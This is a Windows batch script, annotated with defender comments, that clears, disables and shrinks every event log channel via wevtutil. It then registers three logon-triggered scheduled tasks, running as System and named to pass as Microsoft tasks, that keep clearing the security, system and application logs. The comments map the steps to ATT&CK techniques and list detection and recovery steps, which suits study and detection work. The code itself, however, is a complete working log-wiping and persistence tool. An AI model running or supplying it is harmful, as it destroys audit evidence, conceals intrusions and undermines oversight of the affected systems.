@echo off
REM Purpose: clears, disables and shrinks every Windows event log channel
REM returned by wevtutil el, then jumps to theEnd, which registers
REM logon-triggered log-clearing tasks. Despite the window title, nothing
REM here is specific to WMI logs; the loop below covers all channels.
REM Triage mapping (MITRE ATT and CK): T1070.001 Clear Windows Event Logs
REM and T1562.002 Disable Windows Event Logging.
REM Detection: the local logs are the target, so rely on forwarded copies
REM and on process-creation telemetry (Security 4688 with command line, or
REM Sysmon event 1) for wevtutil.exe run with cl, or with sl and /e:false.
TITLE ::: WMI LOGS Disabler :::
color 1C
REM Cosmetic countdown banner. Each ping to loopback is used as a delay;
REM with -n 1 only a single echo request is sent per screen.
echo ############################################################
echo Self-disable WMI Event Logs :::
echo Get Ready for 2 sec ...
echo ############################################################
ping -n 1 127.0.0.1 > nul
cls
echo ############################################################
echo Self-disable WMI Event Logs :::
echo Get Ready for 1 sec ...
echo ############################################################
ping -n 1 127.0.0.1 > nul
cls
echo ############################################################
echo Self-disable WMI Event Logs :::
echo Get Ready for 0 sec ...
echo ############################################################
ping -n 1 127.0.0.1 > nul
cls
echo.
REM Elevation check: adminTest ends up holding the first token of the last
REM non-empty line printed by bcdedit, and is compared with the word Access.
REM NOTE(review): presumably this matches the Access is denied text that
REM bcdedit prints when not elevated - confirm on the target OS language.
FOR /F "tokens=1,2*" %%V IN ('bcdedit') DO SET adminTest=%%V
IF (%adminTest%)==(Access) goto noAdmin
REM Enumerate every channel name and hand each one, quoted, to do_halt.
for /F "tokens=*" %%G in ('wevtutil.exe el') DO (call :do_halt "%%G")
echo.
REM Waits for a key press, shows two status screens, then jumps to theEnd.
pause
cls
echo Event Logs have been halted! Processing..
ping -n 1 127.0.0.1 > nul
cls
echo Event Logs have been halted! Processing....
ping -n 1 127.0.0.1 > nul
goto theEnd
:do_halt
REM Subroutine: argument 1 is one quoted channel name from wevtutil el.
REM Three wevtutil actions are applied to that channel, in this order:
REM   cl            clear all records in the channel
REM   sl /e:false   set the channel to disabled
REM   sl /ms:64     request a maximum log size of 64 bytes
REM No exit code is checked, so a failure on one channel does not stop
REM processing of the remaining channels.
REM Defender notes: clearing the Security log records event 1102 and
REM clearing other logs records event 104 in the System log; alert on those
REM IDs from forwarded copies and on wevtutil command lines using cl or sl.
REM Recovery on an affected host: wevtutil sl CHANNEL /e:true per channel,
REM then restore the maximum size to the value your log policy requires.
echo cleaning %1
wevtutil.exe cl %1
echo halting %1
wevtutil.exe sl %1 /e:false
echo minimizing %1
wevtutil.exe sl %1 /ms:64
goto :eof
:noAdmin
REM Reached when the elevation check fails. There is no goto or exit after
REM the two messages, so execution continues into theEnd below.
echo You must run this script as an Administrator!
echo ^<press any key^>
:theEnd
cls
echo ############################################################
echo Okay, seems legit {x_X}
echo If you need auto-clean system, security and application
echo journals on start please put 'any button' or [X] to exit
echo ############################################################
REM Blocks until a key is pressed; closing the window here is the only way
REM to skip the task creation that follows.
pause>NUL
REM Persistence: three scheduled tasks, trigger ONLOGON, run as System,
REM each clearing one of the security, system and application logs.
REM The task names start with Microsoft and end with Provider, which looks
REM intended to blend in with built-in tasks (T1053.005, T1036.004).
REM Hunting: search task inventories for these exact names and for any task
REM whose action is wevtutil.exe cl. Task registration is recorded as
REM Security event 4698 when that audit policy is enabled, and as event 106
REM in the TaskScheduler Operational channel.
REM Cleanup on an affected host: schtasks /delete /tn NAME for each task.
schtasks /create /sc ONLOGON /tn "Microsoft CSecurity Provider" /tr "wevtutil.exe cl security" /ru "System"
schtasks /create /sc ONLOGON /tn "Microsoft CSystem Provider" /tr "wevtutil.exe cl system" /ru "System"
schtasks /create /sc ONLOGON /tn "Microsoft CApplication Provider" /tr "wevtutil.exe cl application" /ru "System"
cls
echo ############################################################
echo Fine, all work done! :::
echo.
echo ############################################################
ping -n 2 127.0.0.1 > nul
REM exit closes the hosting cmd session, not only this script.
exit